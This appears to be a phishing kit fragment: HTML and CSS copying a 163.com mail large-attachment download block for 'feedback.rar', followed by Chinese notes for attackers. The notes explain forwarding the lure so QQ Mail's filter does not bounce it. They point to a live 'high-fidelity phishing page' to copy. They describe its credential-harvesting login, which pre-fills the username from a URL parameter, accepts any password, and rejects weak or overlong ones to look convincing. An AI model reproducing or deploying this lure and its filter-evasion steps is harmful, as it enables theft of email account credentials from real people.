line-height: normal;
padding: 8px;
zoom: 1;
}
.qB0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
}
.nf0 {
font-family: Microsoft Yahei, verdana;
color: #21293a;
outline: none;
vertical-align: middle;
border-radius: 3px;
font-size: 12px;
line-height: 1.666;
transition: all .5s;
zoom: 1;
background: #fff;
padding: 3px 8px;
height: auto;
display: block;
overflow: hidden;
padding-left: 0;
padding-right: 0;
position: relative;
box-shadow: none;
border: 1px solid #ebebeb;
}
.nui-ipt-placeholder {
font-family: Microsoft Yahei, verdana;
left: 9px;
position: absolute;
top: 0;
cursor: text;
font-size: 12px;
height: 90%;
line-height: 26px;
overflow: hidden;
color: #b7bcc7;
}
.nui-ipt-input {
font-family: Microsoft Yahei, verdana;
background: transparent;
border: none;
font-size: 12px;
margin: 0;
outline: none;
height: 10px;
overflow: hidden;
padding: 3px 10px;
resize: none;
width: 100%;
transition-duration: .5s;
transition-property: all;
}
.qG0 {
font-size: 12px;
font-family: Microsoft Yahei, verdana;
color: #21293a;
line-height: normal;
outline: none;
padding-top: 8px;
position: relative;
display: none;
}
</style>
<div class="lY0">
<div class="sz0">
<div class="tn0" tabindex="0">
<div class="sa0">
<div class="ox0">
<b class="nui-ico-bigAtt">
</b>
<strong class="jU0">
超大附件
<span class="nui-txt-s12">
(1)
</span>
</strong>
<div class="sK0">
</div>
</div>
</div>
<div class="rY0">
<ul class="qs0">
<div>
<br>
</div>
<li class="lh0" tabindex="0">
<div class="dM1">
<div class="ey0">
<div class="dn0">
<div class="cg0">
反馈意见.rar
</div>
</div>
<div class="gi2">
</div>
<a href="https://www.baidu.com" class="cK0" target="_blank" onclick="getTop().handleDownload('/cgi-bin/download?mailid=ZL0006_b5DNJ6qMsQUuY2cAgiBmEeb&filename=%B7%B4%C0%A1%D2%E2%BC%FB.rar&sid=F_jSUt-A9kJpExdw', 'singleNormal', '_blank');" hidefocus="hidefocus">
<span class="cF2">
下载
</span>
</a>
<a class="bJ0" hidefocus="hidefocus">
<span class="cc2">
预览
</span>
</a>
<div class="gi2">
</div>
<a class="cK0" hidefocus="hidefocus" data-buy="未开通安全浏览功能">
<span class="cb1">
<span class="v1">
剩余次数:0次
</span>
安全浏览
<span class="v2">
该附件大小超过限制,仅支持检测
</span>
</span>
</a>
</div>
</div>
<table class="ntes_not_fresh_table">
<tbody>
<tr>
<td class="eG0">
<div class="cf0">
<b class="nui-ico-file75-6">
</b>
</div>
<br></td>
</tr>
<tr>
<td class="gx0">
<strong class="dh0">
反馈意见.rar
</strong>
<span class="di0">
43.47M
</span>
<div class="el0">
<span class="cy0">
(15天后到期)
</span>
<div class="gh1" data-download="https://mail.163.com/large-attachment-download/index.html?member=false">
</div>
</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<div class="nui-split-cDark">
</div>
</div>
</div>
</div></div></div></div><br></div></div></div><br></div></div></div><br></div></div></div><br></div></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div><br></div></div>这里注意下,直接给QQ邮箱发,会被退信:
点进去,转发邮件
然后qq邮箱就不拦截了。
高仿钓鱼页面
http://merpeace.com/index.php 大家直接copy他吧。
点下载,就弹出登录,根据account参数自动填充用户名:
输入“错误”密码登录以后,当然正确的也行。
右上角显示登录成功,然后文件可以下载。
整体来说做的很细节,大家可以参考:
account可以不填,但是填的话,会检测,他发过信的才行,不然就500了
登录的时候,会判断是不是弱口令,是不是超长字符,如果是的话,直接密码错误。很逼真。
登录以后附件就可以下载了,很细节。
